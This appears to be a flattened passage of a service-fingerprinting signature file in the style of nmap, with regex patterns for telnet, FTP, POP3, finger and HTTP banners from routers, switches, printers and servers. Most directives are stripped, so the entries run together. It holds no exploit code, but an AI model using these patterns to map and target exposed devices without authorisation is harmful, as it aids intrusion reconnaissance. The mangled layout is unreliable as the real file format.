BladeCenter\.\r\n\r\n\r\nEnter password: | p|Nortel Layer 2/3 Gigabit Ethernet switch for IBM BladeCenter -\xff\xfb\x01\xff\xfd\"\r\n##### #### ## ## #### #####\r\n## ## ## ## ## # ## ## ## ##\r\n## ## ###### ####### ## #####\r\n## ## ## ####### ## ## ##\r\n## ## ##### ## ## #### ######\r\n A Butter Team Creation\r\n\r\nPassword : -match telnet m=^\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[00H\+----------------------------------------------------------------------\+\r\0\r\n.*\| Motorola (PTP \d+) Lite Console Application +\|\r\0\r\n.*\| Software Version: ([\w._-]+) +\|\r\0\r\n\| Hardware Version: ([\w._-]+) +\|\r\0\r\n=s p/Motorola 1 WAP telnetd/ v/2/ i/hardware version 3/ -\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfe\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05TiMOS-([\w._-]+) cpm/hops ALCATEL SR (\w+) -\xff\xfb\x01\xff\xfb\x03\r\n\x1b\[1;1H\x1b\[2J\r\n\r\nObeh\xf6riga \xe4ga ej tilltr\xe4de\r\n\r\n\xf6vertr\xe4delse beivras\.\r\n\r\n\rUsername: -\n\rTA-005-FXO1-122M : CLI\n\rLogin : -\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista/2008 Ver\. ([\w._-]+)\n\rEvaluation copy, \d+ users enabled\. Expiration date is ([\d/]+)\.\n\r\n\rUser \d+ of \d+\n\r\n\rlogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\+{79}\r\n\r\+{33}#############\+{33}\r\n\r\+{28}###### ######\+{28}\r\n\r -\xff\xfb\x01\xff\xfb\x03BR-telnet@(FES\w+) Router> -\xff\xfb\x01\xff\xfb\x03\r\n\r\nCopyright \(c\) 2005 - 2008 Enterasys, Inc\. All rights reserved\.\r\n\n\r\n\r\n\r\0Username: -\r={74}\n\rTransition Networks Telnet Server\n\rSystem name: SMKG-PKGEAST-([\w._-]+)\n\rPress CTRL-D to disconnect\.\n\rEnter password: -\xff\xfb\x03\xff\xfb\x01\r\n \*{73}\r\n This is a private system\. \r\n Do not attempt to login unless you are an authorized user\. \r\n Any authorized or unauthorized access or use may be monitored and can\r\n result in criminal or civil prosecution under applicable law\.\r\n \*{73}\r\n\r\nMP login: -\xff\xfe\"\xff\xfb\x01\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[5B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[6B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[2C\x1b\[9B\x1b\[7B \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[2B Verify Password \x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9B\x1b\[4B \x0e\x1b\[f\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[9C\x1b\[8C\x1b\[9B\x1b\[1Blqqqqqqqqqqqqqqqqqqqk\x1b -Sorry, new remote sessions are disallowed by current switch configuration\. -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\x1b\[H\x1b\[J\r\nWireless Router Manager Console , Version : ([\w._-]+)\r\nPlease enter your password : -\xff\xfb\x01\xff\xfb\x03\*{60}\r\n\* WARNING ALERT: AUTHORIZED USERS ONLY! +\*\r\n\* +\*\r\n\* All activities conducted on this system may be monitored \*\r\n\* and recorded\. If you are not an authorized user, log off \*\r\n\* immediately\. Illegal entry, misuse, and / or criminal \*\r\n\* activity will be documented and prosecuted to the full \*\r\n\* extend of the law\. +\*\r\n\*{60}\r\n\r\n\r\nPress to accept and continue the login process\.\.\.\.\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\x1b\[2J\x1b\[1;1H\x1b\[1mwb-adtran-\w+ ADTRAN (TDU-\w+)\x1b\[0m\x1b\[2;1HConnecting\.\.\.\. -\r\n%connection closed by remote host!\0 -Sorry, telnet is not allowed on this port! -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nBUFFALO INC\. LinkStation series HS-DHGL\(JINMU\)\r\n\rFENCHURCH login: -\nFelix Remote Shell Console:\r\n============================\r\n\r\n-> -\r\n\r\nBackup Server Telnet Session\r\n\r\nUser: -\xff\xfb\x01\xff\xfd\"\[game001\] remote control session\.\r\nPassword:\0 -\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve J\w+ Switch ([\w-]+)\r\n\rSoftware revision ([\w._-]+)\r\n -\xff\xfb\x01\r\nNetDVRDVS: -nodnsquery/[\d.]+ is not authorized to use the telnet proxy\r\n -\xff\xfc\x01\xff\xfd\"ixProxy V([\d.]+), Copyright \(C\) \d+ Ixia Communications\r\nEnter target port ip address as login name \(example: 10\.0\.1\.1\)\r\nlogin: -\0\0\0H\0\0\0\x02\x0fTimeEdit131\. -0301&<\x16\0\x84\xc7\x02\xe0\xe1\xb1\x008\x13\x1e\x0b\x80<\x16\0\xc7\t\x8f\x05\xc0\xf0X\0\x1c\xc2c\x01p\x1e\x0b\x80\xe3c\x01p\xdcX\0\x1c7\x8f\x05\xc0q\x0b\x80\xe3F\xc7\x02\xe0\xb8,\0\x8e\x1b\xb1\x008n\x05\xc0q\xa3\x008n\xb4\x02\xe0\xb8\xd1\x01p\xdch\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x12\0\x03\0\x04\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x12\0\r\0\x03\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9a\x20\xd0Z\x1e\x1b\xa3\*\xf2\xdd\xe2\(\xc3sp&\xda\xe4Yp\xdbET\xf9\x8cc\xc24\*Y\xbe\xb3\xba\xd6%\xf5\xb668\xad\xab>@D<\x01\xdd>\)\xdb\x18\xf55\xd1\xba\x96\x1c\x17\x17\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x01 -\x0f\0\n\0\x01\0\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\x0b\0\0\0GBXRemote 2 -match vmware-auth m=^220 VMware Authentication Daemon Version (\d[-.\w]+), ServerDaemonProtocol:(SOAP|IPC), MKSDisplayProtocol:VNC= p/VMware Authentication Daemon/ v/1/ i/Uses VNC, 2/ -VTUN server ver \. (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -VTUN server ver \(.*\) (\d[-.\w /]+)\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -250 OK moleSoftware VHCS2 Server Welcomes You !\r\n -TrueWeather\r\n\r\n> -\x96\xfeS\xab -\+ read portFile\n\+ head -1\n\+ find /var/websm/ -([-\w_.]+) xine-ui ([\d.]+) remote server\. Nice to meet you\.\n -Vty password is not set\.\r\n -\r\nUser Access Verification\r\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfe\"\xff\xfd\x1fPassword: -bp[-\w]+: error while loading shared libraries: libstdc\+\+-libc6\.2-2\.so\.3: cannot open shared object file: No such file or directory\n -\0\x0e@........\0\0\0\0\0 -\0\*@.*\0\0\0\0\0 -\0<\xaa\xc5\r\^\xf7\x1b\xd1\xe1a/\xe8\x17P\x9dOb\xbb\x93\x87\xe0\xf3v\x81K\xa4!\xe6\xc7\x01\x977u5A\xd1M\x1b;\xc7\xcb\x87\xb5\x87\xf3~\xc8w\xef\xd3\x87eA\0\^\xbf\xc5\x93i\xf6\x87 -\xa5A\0\x01\0\0\0,\0\0\0\x02\0\0\0L\0\0\0\x08Connect\0\0\0\0x\0\0\0\x0857222\0\0\0 -.\x01.[\x02\x03]\x01\d+\0 -OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n -SuSE Meta pppd \(smpppd\), Version ([\d.]+)\r\n -\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6}'}\"}\(}\"\xc7}#~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\xf4\xd1\xa2\xf6\x7d\x27\x7d\x22\x7d\x28\x7d\x22\xc7\x7d\x23\x7e -\x7e\xff\x7d\x23\xc0\x21}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80~~\xff}#\xc0!}!}!} }4}\"}&} } } } }%}&\x81\xf4\xdb\xc0}'}\"}\(}\"\xc4\x80\x7e --=QDS Task Refactoring Dev v([\w._-]+) Debug Tracing LiveView=-\r\nType quit or \^X to close connection\.\r\n\r\n -503 Service Unavailable\r\n\r\n\0 -Microsoft Windows XP \[Version [\d.]+\]\n\(C\) Copyright 1985-\d+ Microsoft Corp\.\n\nC:\\> -HELLO Welcome to Tunnel Vision \(([\d.]+)\)\n -\0\0\0\x04Z(\d)([1-9]\d) -Invalid request string: Request string is: \"\r\" -Feedback\nError=You need unique ID to command ABC! -#connected,all connect count: 1{\"event\":\"device_status\",\"data\":{\"wifi_name\":\"([^\"]+)\",\"wifi_signal\":\d+,\"battery\":\d+,\"batterycharging\":\w+,\"gsm_signal\":\d+,\"sms_unread\":\d+,\"sdcard\":\d+,\"updateinfo\":null}} --\0\0\0\0| p|IBM OS/400 as-servermapd| o|OS/400 -\x99\xf3\0\0\0\0\0\0\xff\xff\xff\xff -\0\0\0\0\0\0\0\x08 -\[AUTHPOINT RESPONSE\]\r\nreturn_code=AUTHPOINT ERROR\r\nreturn_code_text=Error response parsed by base message object: Invalid or missing register #\r\nresponse=\r\nidentifier=\r\napproval_code=\r\n -Unknown command\r\n -Can't fork pty, bye!\n -Message received\n -Use of uninitialized value in transliteration \(tr///\) at /var/jchkmail/user-filter -Connection from \[[\d.]+\]\r\n\r\nEnter your account name and password\.\r\nSorry, there is no guest account\.\r\n\r\nUsername: -\r\nEnter your account name and password\.\r\n\r\nUsername: -\n\x03 -unrecognized op\n\x03 -\nunrecognized op\n\n\x03 -\n(\d+)\n(\d+)\n(\d+) -\xc0\0\x01\0....\0\0\0\x03 -200-At least a module and a command must be specified\r\n200-At least a module and a command must be specified\r\n -\nWelcome to the Computone IntelliServer `([\w._-]+)'\nRunning cnx kernel release ([\w._, -]+)\n\npt-ses day time owner command\n -Idle\r\n -UNKNOWN COMMAND\n -_err=refused%20by%20workers\r\n -ok\r\nunknown command\r\nunknown command\r\n -Expecting SSL \(optional\) and CONFIG as first commands\.\n -X01\r\nX01\r\n -Invalid FT GWADDR / START protocol\n -\x03Not a valid name\. This may because you left it blank or used invalid symbols\. Please try again\.\n -Finger online user list request denied\.\r\n -Username Real name Idletime TTY Remote console location\n -Login Name Tty Idle Login Time Office Office Phone\r\n -\r\nIntegrated port\r\nPrinter Type: Dell Laser Printer ([-\w+.]+)\r\nPrint Job Status: (.*)\r\n -This is ([-\w_.]+) finger server\.\r\n\r\nPlease use username@domain format\.\r\n -\r\nIntegrated port\r\nPrinter Type: Lexmark ([^\r\n]+)\r\n -finger: /var/adm/lastlog open error\nNo one logged on\r\n -Debian GNU/Linux Copyright \(C\) 1993-1999 Software in the Public Interest\n.*You haven't specified a user\.\n\n A general listing is not provided to the public\. -\r\nPrinter Type: Lexmark Optra LaserPrinter\r\n -MSS485 Version V([\w._/-]+)\(([\w._-]+)\) - Time Since Boot: -220 Welcome to Stupid-FTPd server\.\r\n422 Too busy to play with you\.\r\n -520 invalid command\n -\xea\xdd\xbe\xef\0\0\0\x05\0\0\x000\0\0\x000\0\0..\0\0\0\x08\0a\0f\0f\0s\0p\0r\0n\0g\0\0\0\0\0\0\0\0 -220 Inactivity timer = \d+ seconds\. Use 'site idle ' to change\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n221 Goodbye \(badly formated command seen\)\. You uploaded 0 and downloaded 0 kbytes\.\r\n -220 \r\n500 Unknown command: \"\"\r\n500 Unknown command: \"\"\r\n -220 ([-.\w]+) FTP Server ready \.\.\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n530 \r : User not logged in\. Please login with USER and PASS first\.\r\n -220 \"Welcome to Bot FTP service\.\"\r\n331 Please specify the password\.\r\n230 Login successful\. Have fun\.\r\n -220 OK\n226 OK\n -220 Welcome to pyftpd\. Happy downloading\.\r\n500 I'm gonna ignore this command\.\.\. maybe later\.\.\.\r\n -220 ([\w._-]+) server ready\.\r\n502 command not implemented\.\r\n502 command not implemented\.\r\n -220 UnleashX FTP ready\.\r\n503 Login with USER first\.\r\n -220 ps2ftpd ready\.\r\n500 Not understood\.\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfc\"\r\n\r\n\n\rauthentication failed!\n\rpassword: -\xff\xfc\"\xff\xfb\x01\r\nPassword: \r\nbad password\r\n| p|Campbell Scientific NL-100/105 Ethernet-to-serial bridge telnetd -FlashCONNECT ([\d.]+) invalid message\.\n -\\0\0\0\xd4\x17\0\0\x01\0\0\0\x05\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -\nBad connect string! -{type INIT} {up \d+} {auth \d+} {name {([^}]+)}} {ip [\d.]+} {max \d+} {port (\d+)}\r\n -\xf2\xfa\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\xf2\0\0\0\0\0\0\0\0 -HTTP/1\.1 501 Not Implemented\r\nCache-Control: no-cache, must-revalidate, max-age=0\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: \d+\r\nConnection: close\r\n\r\n

Not Implemented

Whatever the heck you just requested, I can't generate\. -HTTP/1\.0 501 Document Follows\r\nContent-Type: text/html\r\nContent-Length: 106\r\n\r\n501 Method Not Implemented\r\n

501 Method Not Implemented

\r\n -HTTP/1\.0 400 Bad Request\r\n.*Server: PeopleSoft PSRENSRV/([\w._-]+)\r\n.*PeopleSoft PSRENSRV/[\w._-]+ on http://([\w._-]+):\d+ -<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\t\n\t\t([\w._-]+)\n\t\t[\d.]+\n\t\n\t\n\t\t\n\t\t\tNo destination specified\n\t\t\n\t\n\n\n -0, 0: ERROR: UNKNOWN-ERROR\n -0 , 0 : ERROR : UNKNOWN-ERROR\r\n -0 , 0 : ERROR : INVALID-PORT\r\n - : ERROR : UNKNOWN-ERROR\r\n -0, 0 : ERROR : X-INVALID-REQUEST\r\n -0 , 0 : ERROR : INVALID-PORT\r\n0 , 0 : ERROR : INVALID-PORT\r\n -0, 0 : ERROR : INVALID-PORT\r\n -0,0 : ERROR : INVALID-PORT\r\n -0 , 0 : ERROR :INVALID-PORT\r\n - : USERID : UNIX : ([-\w_]+) - : USERID : UNIX : [a-z]{4,8}\r\n -1 , 1 : USERID : OTHER : chuck-the-bsd-deamon\r\n -, : USERID : UNIX : [^\r\n]+\r\n -\* OK IMAP4 1\.0 server ready\r\n\* BAD Argument\r\n -ERR password required\r\nERR password required\r\n -ERR administrator password required\r\nERR administrator password required\r\n - \r\nSorry, that nickname format is invalid\.\r\r\n -:([-\w_.]+) 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n:[-\w_.]+ 421 \r\n\r\n :\r\n\r\n unimplemented protocol request\r\n -\+OK \r\n-ERR XXX authorization first\r\n -HLO 0 0 \. 0 71\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nLRNP/1\.1\r\n\r\nlistener\r\nEND\r\nERR 0 1 \. 71 80\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\n451 0 Invalid message \(-2001\)\r\nEND\r\nMSG 0 2 \. 151 58\r\nContent-type: application/vnd\.laserfiche\.lrnp\r\n\r\nCLOSE 0\r\nEND\r\n -ERROR: Command doesn't seem to be followed by a space followed by arguments\n -.\x08\0\0 -500 access denied: Check networking/linuxconf network access\r\n -BEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\nBEGIN\n\r\nERROR\nDATA\n1\nbad send packet\nEND\n -\x02\x02 -ERROR\r\nERROR\r\n -\x82\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -ERROR: Unknown request number\. -ERROR: Invalid password\.\nERROR: Invalid password\.\n -HP OpenView OmniBack II ([-.\w]+): INET, -\0\0\xfa\xda\0\x02 -598::Command not recognized\.\r\n598::Command not recognized\.\r\n| p|Mercury/32 PH addressbook server -\+OK POP3 ([-.+\w]+) v(\d[-.\w]+) server ready\r\n -\+OK POP3 \[([-.+\w]+)\] (\d[-.\w]+) server ready\r\n -\+OK POP3 \[([-.\w]+)\] v(200[-.\w]+) server ready\r\n-ERR Null command\r\n-ERR Null command\r\n -\+OK POP3 server ready\r\n-ERR invalid command\r\n| p/IBM OS 400 pop3d/ o|OS/400 -\+OK pop server ready\r\n -\+OK ([\w._-]+)\r\n-ERR Invalid command in current state\.\r\n-ERR Invalid command in current state\.\r\n --ERR Invalid command\.\r\n-ERR Invalid command\.\r\n -\+OK POP3 ready\r\n-ERR invalid command\r\n -\+OK POP3 Ready ([-\w_.]+) \w+\r\n-ERR Null command, mate\r\n -\+OK POP3Proxy ready\r\n-ERR Unknown command\r\n-ERR Unknown command\r\n -EInvalid packet length\0 -EFATAL 1: invalid length of startup packet\n\0 -\xff -\xc0\0\x12Data field missing -\xff\x17Access to unopened port. -Status: 400 Bad Request\r\nContent-Length: 0\r\n\r\n -\xa8\x08C\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 -ERR 27 -\xf1\xf8\xf2\xf6\xf3\xf3\xf0\xf0\xf3\xf8\xf7\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xe2\xf6\xf5\xf6\xf9\xc5\xf9\xc3\0\xf0\xf0\xf3\xf1\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0\xf0 -\x05\x01\0.\0\0\0\0\0\0 -\x02\0\x01\xfb\xff\xfb\xff\xff\xff\xff\xffNOSUP -SPAMD/1\.0 76 Bad header line: \r\n -ERHD -\x01\0\0\0 -SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 -\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer -\xff\xfb\x03\xff\xfb\x01 -\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: -514 Authentication required\.\r\n -login: Password: Login incorrect\. -login: uucpd: \d+-\d+ The user is not known\.\n -%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n -% No entries found for the selected source\(s\)\.\n -128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n -\x02\x01 -SDPACK -\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n -match telnet m=^\xff\xfb\x01\xff\xfb\x03\r\n\r\n\r\n +-+\r\n +\| Cyclades-PR4000: CyROS V_([\d.]+) \(.*\) \|\r\n= p/Cyclades PR4000 router telnetd/ v/1/ d/router/ -\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: -\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy -\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n -\xff\xfb\x01Login: \r\nLogin: \r\nLogin: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: -\xff\xfb\x01\n\r-> \n\r-> \n\r-> -bad password\r\n -\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: -\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n -\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: -\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: -\r\nPress return:\*\*\*\*\r\nEnter Password: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server -\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n -\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( -\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: - 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n -User Name: \r\r\nPassword: \r\r\nRemote MAC address: -\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) -\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: -\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: -\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n -\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n -\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: -\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : -\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> -\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request - 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n - 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n -HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n - 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n -HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n -HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n -0\x82\x01\n\x02\x82\x01\x01\0 -HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n -\xff\xff\xfb& -Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n -sh-2\.05b\ -WTAM/1\.0 401 Unrecognized Command\n\n -Command Shell\r\n\r\n% \r\n% -201- connected\r\n407- unknown command\r\n -HELLO XBOX! -ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED -\*\*\x18B0100000023be50\r\x8a\x11 -<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n -(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n -\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 -:[-\w_.]+ 451 GET :\r\n -\n\nDirectory /\n\n\n\n

Directory listing of /

